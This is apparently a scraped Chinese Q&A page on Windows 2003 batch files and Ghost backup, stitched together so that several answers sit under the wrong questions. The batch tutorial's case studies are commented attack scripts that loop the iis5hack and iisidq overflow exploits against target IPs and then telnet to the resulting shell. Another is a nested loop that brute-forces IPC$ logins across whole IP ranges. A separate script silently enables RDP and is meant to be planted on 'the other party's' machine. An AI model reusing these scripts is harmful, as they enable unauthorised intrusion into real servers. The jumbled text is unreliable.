win2003优化批处理_win10服务优化批处理

1.如何实现Win2003系统定时重启功能方法

2.什么是批处理？

3.win2003用什么还原系统好?

4.服务器WIN2003如何自动清除C:\WINDOWS\system32\LogFiles W3C访问日志记录?

5.win7里面如何体现出批处理操作系统、分时操作系统以及实时系统的特点

6.如何实现win2003服务器定时自动重启？

BAT文件内容 ========================== echo Windows Registry Editor Version 5.00>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg ============================== 保存为BAT文件然后执行就好。

纳哦

如何实现Win2003系统定时重启功能方法

可以的。把以下内容保存成一个批处理，传到对方计算机里，再运行就可以了；当然你直接输也没问题。（注：限Win2003/XP）

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

这是使用注册表的方法，其实注册表是个很有用的工具，好好利用一下吧！呵呵。

什么是批处理？

　1、首先，打开记事本程序，输入如下命令代码：shutdown -r -f -t 30

命令解释：r参数指定服务器系统重新启动，f参数强行关闭服务器系统中的顽固进程和应用程序，t参数表示系统关机倒记时的时间。

然后选择"另存为"，注意文件类型选为"所有文件"，文件名输入为"Restart.bat"，即保存成“.bat”格式的批处理文件，并将之保存至合适的位置。

2、接着，依次单击“开始-程序-附件-系统工具-任务”命令，用鼠标双击其后界面中的“添加新任务”图标，打开新任务创建向导界面。单击“下一步”按钮，从应用程序列表框中单击“浏览”按钮，打开文件选择对话框，将之前生成的“Restart.bat”文件选中并导入到向导窗口中。然后为新建的任务取个合适的名称，并将“该任务的执行”设置为“每天”。单击“下一步”按钮后，进入设置界面，将新任务的运行起始时间指定为每天“4:00”。再单击“完成”结束服务器定时重启任务的创建操作。

　经过以上步骤详细地设置之后，服务器系统就会在我们设定的时间实现自动重新启动了。

win2003用什么还原系统好?

就是把很多执行操作按照自己需要的顺序和参数排列，一次性执行！

通常为.bat文件！！！

精通批处理教程

最近好多猜测弱口令的在网上流行，比如前段时间闹得很厉害的Worm.Dvldr 蠕虫就是一个典型。这些有个共同点就是利用批处理来进行ipc$连接，从而来猜测管理员的口令达到控制服务器的目的。由几个文件和几个复杂的批处理组成。批处理算不上真正意义上的编程，但是它的一些思想和编程比较近似。通过在网上和一些初学的朋友交流，发现他们对于批处理很感兴趣，多多少少了解一些命令的用法，但缺乏比较系统的了解，所以特意写下这篇教程，好让感兴趣的朋友对批处理有个整体的认识，并能通过该教程举一反三，写出自己的批处理。

该教程一共分为4大部分，第一部分是批处理的专用命令，第二部分是特殊的符号与批处理，第三部分是批处理与变量，第四部分是完整案例。因为教程比较长，所有在杂志上我们将分为两次连载，本期首先刊登一、二两部分，敬请读者注意。

第一部分：批处理的专用命令:

批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件，其扩展名为BAT。这些命令统称批处理命令，下面我就来给大家介绍一下批处理的命令。

1、 REM

REM 是个注释命令一般是用来给程序加上注解的，该命令后的内容在程序执行的时候将不会被显示和执行。例：

REM 你现在看到的就是注解，这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。

2、 ECHO

ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例：

Echo off

Rem 以上代表关闭回显即不显示所执行的命令

Echo 这个就是消息。

Rem 以上代表显示“这就是消息”这列字符

执行结果：

C:\>ECHO.BAT

这个就是消息。

3、 GOTO

GOTO 即为跳转的意思。在批处理中允许以“：XXX”来构建一个标号然后用GOTO ：标号直接来执行标号后的命令。例

:LABEL

REM 上面就是名为LABEL的标号。

DIR C:\

DIR D:\

GOTO LABEL

REM 以上程序跳转标号LABEL处继续执行。

4、CALL

CALL 命令可以在批处理执行过程中调用另一个批处理，当另一个批处理执行完后再继续执行原来的批处理。例：

批处理2.BAT内容如下：

ECHO 这就是2的内容

批处理1.BAT内容如下：

ECHO 这是1的内容

CALL 2.BAT

ECHO 1和2的内容全部显示完成

执行结果如下：

C:\>1.BAT

这是1的内容

这就是2的内容

1和2的内容全部显示完成

5、PAUSE

PAUSE 停止系统命令的执行并显示下面的内容。例：

C:\> PAUSE

请按任意键继续 . . .

6、 IF

IF 条件判断语句，语法格式如下：

IF [NOT] ERRORLEVEL number command

IF [NOT] string1==string2 command

IF [NOT] EXIST filename command

说明：

[NOT] 将返回的结果取反值即“如果没有”的意思。

ERRORLEVEL 是命令执行完成后返回的退出值

Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。

string1==string2 string1和string2都为字符的数据，英文字符的大小写将看做不同，这个条件中的等于号必须是2个（绝对相等），条件想等后即执行后面的 command

EXIST filename 为文件或目录存在的意思。

IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。

例：

1、 IF [NOT] ERRORLEVEL number command

检测命令执行完后的返回值做出判断。

echo off

dir z:

rem 如果退出代码为1（不成功）就跳至标题1处执行

IF ERRORLEVEL 1 goto 1

rem 如果退出代码为0（成功）就跳至标题0处执行

IF ERRORLEVEL 0 goto 0

:0

echo 命令执行成功！

Rem 程序执行完毕跳至标题exit处退出

goto exit

:1

echo 命令执行失败！

Rem 程序执行完毕跳至标题exit处退出

goto exit

:exit

Rem 这里是程序的出口

2、 IF string1==string2 command

检测当前变量的值做出判断

ECHO OFF

IF %1==2 goto no

Echo 变量相等！

Goto exit

:no

echo 变量不相等

goto exit

:exit

大家可以这样看效果 C:\>test.bat 数字

3、 IF [NOT] EXIST filename command

发现特定的文件做出判断

echo off

IF not EXIST autoexec.bat goto 1

echo 文件存在成功！

goto exit

:1

echo 文件不存在失败！

goto exit

:exit

这个批处理大家可以放在c盘和d盘分别执行看看效果。

7、 FOR

FOR这个命令比较特殊是一个循环执行命令的命令，同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了，后面再来讲解套用的循环。在批处理中FOR的命令如下：

FOR [%%c] IN (set) DO [command] [arguments]

在命令行中命令如下：

FOR [%c] IN (set) DO [command] [arguments]

常用参数：

/L 该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。

/D 如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。

/F 从指定的文件中读取数据作为变量

eol=c - 指一个行注释字符的结尾(就一个)

skip=n - 指在文件开始时忽略的行数。

delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。

tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。

usebackq - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。

下面来看一个例子：

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 'z' 或'Z' 的变量。请记住，FOR 变量名分大小写，是通用的；而且，同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

以下列举一个简单的例子，他将说明参数/L和没有参数的区别：

删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT

例：

ECHO OFF

FOR /L %%F IN (1,1,5) DO DEL %%F.TXT

或

FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT

以上2条命令执行的结果都是一样的如下：

C:\>DEL 1.TXT

C:\>DEL 2.TXT

C:\>DEL 3.TXT

C:\>DEL 4.TXT

C:\>DEL 5.TXT

8、 SETLOCAL

开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后

所做的环境改动只限于批处理文件。要还原原先的设置，必须执

行 ENDLOCAL。 达到批处理文件结尾时，对于该批处理文件的每个

尚未执行的 SETLOCAL 命令，都会有一个隐含的 ENDLOCAL 被

执行。例：

@ECHO OFF

SET PATH /*察看环境变量PATH

PAUSE

SETLOCAL

SET PATH=E:\TOOLS /*重新设置环境变量PATH

SET PATH

PAUSE

ENDLOCAL

SET PATH

从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:\TOOLS后显示为E:\TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。

9、 SHIFT

SHIFT命令可以让在命令上的的命令使用超过10个（%0~%9）以上的可替代参数例：

ECHO OFF

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

执行结果如下：

C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

1 2 3 4 5 6 7 8 9

2 3 4 5 6 7 8 9 10

3 4 5 6 7 8 9 10 11

以上就是基于WIN2000下的9个批处理命令。

第二部分：特殊的符号与批处理

在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。

1、 符号(@)

@在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求

2、 符号(>)

>的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围（后面可是文件也可是默认的系统控制台）例：

文件1.txt的文件内容为：

1+1

使用命令c:\>dir *.txt >1.txt

这时候1.txt的内容如下

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C:\ 的目录

2003-03-11 14:04 1,005 FRUNLOG.TXT

2003-04-04 16:38 18,598,494 log.txt

2003-04-04 17:02 5 1.txt

2003-03-12 11:43 0 aierrorlog.txt

2003-03-30 00:35 30,571 202.108.txt

5 个文件 18,630,070 字节

0 个目录 1,191,542,784 可用字节

>将命令执行的结果覆盖了原始的文件内容。

在传递给控制台的时候程序将不会有任何回显（注意：这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显，这里的回显是程序执行中或后的回显）例：

C:\>dir *.txt >nul

程序将没有任何显示也不会产生任何痕迹。

3、 符号(>>)

符号>>的作用与符号>相似，但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台（用法同上）例：

文件1.txt内同为：

1+1

使用命令c:\>dir *.txt >>1.txt

这时候1.txt的内容如下

1+1

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C:\ 的目录

2003-03-11 14:04 1,005 FRUNLOG.TXT

2003-04-04 16:38 18,598,494 log.txt

2003-04-04 17:02 5 1.txt

2003-03-12 11:43 0 aierrorlog.txt

2003-03-30 00:35 30,571 202.108.txt

5 个文件 18,630,070 字节

0 个目录 1,191,542,784 可用字节

>>将命令执行的结果覆加在了原始的文件内容后面。

4、 符号(|)

|是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例：

C:\>dir c:\|find "1508"

卷的序列号是 301A-1508

以上命令的意思为查找c:\的所有并发现1508字符串。Find的用法请用 find /?自行查看

在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的

echo y|fornat a: /s /q /v:system

用过format命令的人都知道format有一个交互对化过程，要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的（这条命令有危害性，测试的时候请谨慎）

5、 符号(^)

^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例：

c:\>echo test ^> 1.txt

test > 1.txt

从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。

6、 符号(&)

&符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个命令的执行。例：

c:\> dir z:\ &dir y:\ &dir c:\

以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。

7、 符号(&&)

&&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。例：

c:\> dir z:\ &&dir y:\ &&dir c:\

以上的命令将会提示检查是否存在z:盘如果存在则执行，如果不存在则停止执行所有的后续命令

8、 符号(" ")

" "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例:

c:\>cd “Program Files”

c:\>cd progra~1

c:\>cd pro*

以上方法都可以进入Program Files目录

9、 符号（,）

,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例：

c:\>dir,c:\

10、 符号(

;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例：

DIR C:\;D:\;E:\F:\

以上的命令相当于

DIR C:\

DIR D:\

DIR E:\

DIR F:\

当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。

第三部分：批处理与变量

在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下：

C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

SHIFT.BAT 1 2 3 4 5 6 7 8 9

1 2 3 4 5 6 7 8 9 10

2 3 4 5 6 7 8 9 10 11

系统是如何区分每个变量的呢，系统区分变量的规则为字符串中间的空格，即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例：

批处理内容为：

ECHO %1

ECHO %2

ECHO %3

输入命令：

C:\>TEST “Program Files” Program Files

Program Files

Program

Files

在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢？在系统中还有一种变量称之为环境变量（使用SET命令可以查看当前系统的环境变量）如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候，我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用，环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子，批处理如下：

ECHO OFF

SET PASS=%1

SHIFT

SET PASS1=%1

SHIFT

ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %PASS% %PASS1% %9

SET PASS=%PASS1% 变量的传递

SET PASS1=%9

SHIFT

ECHO %PASS% %PASS1% %9

使用命令：C:\>TEST A B 3 4 5 6 7 8 9 10 K L

A B 3 4 5 6 7 8 9 10 K 注意：这一行显示了11个变量

A B L 在使用了3次SHIFT之后%9变成了L

B L 变量的传递后的结果

第四部分：完整案例

以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理，看看他们是怎么运作的。这里我将列举三个例子来详细分析，为了保持程序的完整我的注释会加在/*后面。

例一

这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为：

iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本，我们编制的批处理使用的命令格式为 <iis.bat 目标ip （开始版本号）>开始版本号可有可无。程序如下。

@echo off /*关闭命令回显

if "%1%"=="" goto help /*判断%1是否为空，%1为目标ip

if "%2%"=="1" goto 1 /*判断%2是否为1，为1则跳转标志1

if "%2%"=="2" goto 2 /*%2为开始版本号，如果没有设置则

if "%2%"=="3" goto 3 /*如果存在则从匹配的地方开始执行

if "%2%"=="4" goto 4

if "%2%"=="5" goto 5

if "%2%"=="6" goto 6

if "%2%"=="7" goto 7

if "%2%"=="8" goto 8

if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容

ping %1 -n 1 | find "Received = 1" /*ping目标1次，从结果中发现Received = 1

if errorlevel 1 goto error /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行)

iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接端口88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good)

if not errorlevel 1 goto telnet /*如果没有错误代码1（溢出成功）就执行telnet段的内容。

echo 操作系统类型 9 失败! /否则显示这一句

:8 /*以下代码内容参照上面

iis5hack %1 80 8 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 8 失败!

:7

iis5hack %1 80 7 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 7 失败!

:6

iis5hack %1 80 6 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 6 失败!

:5

iis5hack %1 80 5 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 5 失败!

:4

iis5hack %1 80 4 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 4 失败!

:3

iis5hack %1 80 3 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 3 失败!

:2

iis5hack %1 80 2 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 2 失败!

:1

iis5hack %1 80 1 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 1 失败!

:0

iis5hack %1 80 0 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 0 失败!

goto error

:telnet

telnet %1 88 /*开始连接目标ip的88端口

goto exit /*连接中断后跳转exit段

:error /*error段显示错误后的帮助信息

echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!

echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]

ECHO 中文: 0

ECHO 中文+sp1: 1

ECHO 英文: 2

ECHO 英文+sp1: 3

ECHO 日语: 4

ECHO 日语+sp1: 5

ECHO 韩文: 6

ECHO 韩文+sp1: 7

ECHO 墨西哥语: 8

ECHO 墨西哥语+sp1: 9

goto exit /*跳转exit段

:file /*file段显示文件没有发现的信息

echo 文件iis5hack.exe没有发现!程序终止运行!

goto exit /*跳转exit段

:help /*help段显示本批处理的使用格式帮助

echo 本程序用法如下:

echo iis [目标ip]

echo iis [目标ip] [开始的号码9-0]

:exit /*exit段为程序出口

这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大！

例二

这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下：

运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>

其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。

其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 <idq.bat 目标ip>程序如下：

@echo off /*同例一

if not EXIST iisidq.exe goto file /*同例一

if %1 == "" goto error /*同例一

ping %1 -n 1 | find "Received = 1" /*同例一

if errorlevel 1 goto error1 /*同例一

set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip

set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。

:no /*no段开始

if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。

if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码，用计数器来控制其

if %a%==2 set d=2 /*变动。

if %a%==3 set d=3

if %a%==4 set d=4

if %a%==5 set d=5

if %a%==6 set d=6

if %a%==7 set d=7

if %a%==9 set d=9

if %a%==10 set d=13

if %a%==11 set d=14

goto 0 /*变量传递完成后转到标志0处运行

:1

echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......

:0 /*标志0开始

IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good（发送代码成功才会有字符串good）

if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳

/*转标志1处继续尝试发送

ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执

/*行结果

echo 正在执行第%d%项! /*报告正在溢出的操作系统类型

telnet %b% 99 /*连接溢出端口

echo. /*显示一个空行

if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处（循环出口）

if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值

if %d%==9 set a=10

if %d%==7 set a=9

if %d%==6 set a=7

if %d%==5 set a=6

if %d%==4 set a=5

if %d%==3 set a=4

if %d%==2 set a=3

if %d%==1 set a=2

if %d%==0 set a=1

goto no /*附值完成跳转no段执行

:file /*以下都是出错后的帮助提示

echo IIsidq.exe没有发现!将该文件和本文件放在同一目录!

goto exit

:error

echo 错误!目标ip不可识别!请使用下面的格式连接!

echo idq [目标IP]

goto exit

:error1

echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至!

echo 请按照下面的格式手工尝试!

echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口]

echo telnet [目标ip] [溢出端口]

:exit /*整个程序的出口

这个批处理用的整体循环掌握好计数器部分就掌握了这个批处理。

例三

for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f

上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为：C:\>TEST.BAT 218 当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令 (这里我把上面的值都带进去，设密码为123 用户名为 abc)

net usr \\218.0.0.1\ipc$ 123 /u:abc

当然上面这个例子可能有些朋友会说太简单并且太死板不灵活。我把这个例子做了些修改（完整文件见光盘ipc.bat）由兴趣的朋友可以自己看看。修改后的程序可以灵活的查找你指定开始到结束或你指定开始到最大ip的范围。当然功能还可以在加强，至于能加强到什么地步能不能成为一个新的工具那就是你的事了。

这个的循环动作大了点主要是ip的数字替换麻烦所以没办法。这个批处理我就不写注释了，大家好好的参考上面的内容你会很快看懂这个批处理的。看懂了得不要说简单哦！最起码这是个没有使用任何第三方工具就能探测并保存弱口令的批处理了！！简单的改一改杀伤力还是很大的。以上这些批处理全部在win2000和xp下测试通过最大的优点就是只有一个批处理文件并且绝对不会误报。缺点就是太长！

服务器WIN2003如何自动清除C:\WINDOWS\system32\LogFiles W3C访问日志记录?

Ghost Go V2.2.9121

://.skycn/soft/11903.html

Ghost的出现的确为我们带来了很大的方便，除了备份和恢复系统以外，还有很多方便实用的用途。但是面对满屏幕的英文来操作它的话，的确让人有点不放心，稍有不慎便会造成无法挽救的损失！

有了GhostGo的出现，操作Ghost不再是一件困难的事情！把在DOS下操作英文Ghost的情景转换到用户最熟悉的Windows中文环境下操作。详细设置每一个要执行的任务：备份系统；恢复系统；复制硬盘；复制分区等。任务设置也极其简单，你要做的只是轻点几下鼠标，详尽的中文提示，使得设置任务轻松方便。如果你觉得自己设置任务还是太麻烦的话，还可以使用“任务模板”功能快速创建预先设置好的任务，任务模板还可以无限扩展，朋友不会设置任务了，没问题，帮他设置好，再把任务模版发给她……OK!

GhostGo支持FAT16、FAT32和NTFS分区，并且支持多硬盘系统。新增的自动设置功能，可以自动识别分区位置、格式和容量。自动创建备份和恢复任务，让你可以针对当前的计算机更快捷、安全的制作和恢复系统备份。

任务设置完了，把任务创建到软盘，文件夹或者光盘，使用它引导系统，在出现中文任务信息后，按下“Y”键，搞定！OK，现在让我们将克隆进行到底！Go～

Ghost 使用详解

--------------------------------------------------------------------------------

一、分区备份

使用Ghost进行系统备份，有整个硬盘（Disk）和分区硬盘（Partition）两种方式。在菜单中点击 Local（本地）项，在右面弹出的菜单中有3个子项，其中 Disk表示备份整个硬盘（即克隆）、Partition 表示备份硬盘的单个分区、Check 表示检查硬盘或备份的文件，查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据，特别是在恢复和复制系统分区时具有实用价值。

选 Local→Partition→To Image 菜单，弹出硬盘选择窗口，开始分区备份操作。点击该窗口中白色的硬盘信息条，选择硬盘，进入窗口，选择要操作的分区（若没有鼠标，可用键盘进行操作：TAB键进行切换，回车键进行确认，方向键进行选择）。 在弹出的窗口中选择备份储存的目录路径并输入备份文件名称，注意备份文件的名称带有 GHO 的后缀名。 接下来，程序会询问是否压缩备份数据，并给出3个选择：No 表示不压缩，Fast表示压缩比例小而执行备份速度较快，High 就是压缩比例高但执行备份速度相当慢。最后选择 Yes 按钮即开始进行分区硬盘的备份。Ghost 备份的速度相当快，不用久等就可以完成，备份的文件以 GHO 后缀名储存在设定的目录中。

二、硬盘克隆与备份

硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk，在弹出的窗口中选择源硬盘（第一个硬盘），然后选择要复制到的目标硬盘（第二个硬盘）。注意，可以设置目标硬盘各个分区的大小，Ghost 可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择 Yes 开始执行。

Ghost 能将目标硬盘复制得与源硬盘几乎完全一样，并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小，必须能将源硬盘的数据内容装下。

Ghost 还提供了一项硬盘备份功能，就是将整个硬盘的数据备份成一个文件保存在硬盘上（菜单 Local→Disk→To Image），然后就可以随时还原到其他硬盘或源硬盘上，这对安装多个系统很方便。使用方法与分区备份相似。

三、备份还原

如果硬盘中备份的分区数据受到损坏，用一般数据修复方法不能修复，以及系统被破坏后不能启动，都可以用备份的数据进行完全的复原而无须重新安装程序或系统。当然，也可以将备份还原到另一个硬盘上。

要恢复备份的分区，就在界面中选择菜单Local→Partition→From Image，在弹出窗口中选择还原的备份文件，再选择还原的硬盘和分区，点击 Yes 按钮即可。

四、局域网操作

LPT 是通过并口传送备份文件,下面有两个选项：sle 和 master, 分别用以连接主机和客户机。 网络基本输入输出系统 NetBios 和 LPT 相似, 也有 sle 和 master 两个选项, 作用与 LPT 相同。

先和平时一样将要 ghost 的分区做成一个 *.gho 文件，再在一台 win98 上安装Symantec Ghost 企业版，重启。

1. 首先制作一张 ghost 带网卡驱动的启动盘。Start > Programs > Symantec Ghost > Ghost Boot Wizard－>Network Boot Disk 如果你的网卡在列表内直接选择它就可以生成一张带 PC-DOS 的启动盘。（但 6.5版的生成的软盘经常有问题，不能成功启动）如果你的网卡不在列表内，你要建立专用的 Packet Driver。ADD->Packet Driver (网卡的驱动程序中有)往下根据提示一步一步走，填入工作站的 ip（ghost 一定要 tcp/ip 协议）。最后生成一张软盘，但此软盘仍不能使用，要改 autoexec.bat 文件在 net xxxx.dos 后面加一个16进制的地址，如 0X75 等。多台计算机只需改 wattcp.cfg 文件中的 ip 即可:

IP = 192.168.100.44

NETMASK = 255.255.255.0

GATEWAY = 192.168.100.1

2. 在 server 端运行 multicast server 出来的画面。先给 server一个Session Name（别名）如：bb，再选择 image file 就是你的 gho 文件。然后 －>Dump From Client->rtitions->More Options-> 在 auto start 的 client 中填入 50（如果你要同时复制50台）->accept client 就算完成了，当你的工作站数达到50台时，server就自动传送*.gho 文件。

3.详述：

目前，相当多的电子教室都用了没有软驱、光驱的工作站。在没有软驱、光驱的情况下，当硬盘的软件系统出现问题时，能否实现网络硬盘克隆呢？PXE（Preboot Execution Environment，它是基于 TCP/IP、DHCP、TFTP 等 Internet 协议之上的扩展网络协议）技术提供的从网络启动的功能，让我们找到了解决之道。下面，我们就来讲解怎样用Ghost 7.0来实现基于 PXE 的网络硬盘克隆。

网络硬盘克隆过程简述

网络硬盘克隆过程为：在装有软驱的工作站上，用一张引导盘来启动机器，连接到服务器，使用 Ghost 多播服务（Multicast Server）将硬盘或分区的映像克隆到工作站，这样就实现了不拆机、安全、快速的网络硬盘克隆。

实现 PXE 网络启动方式

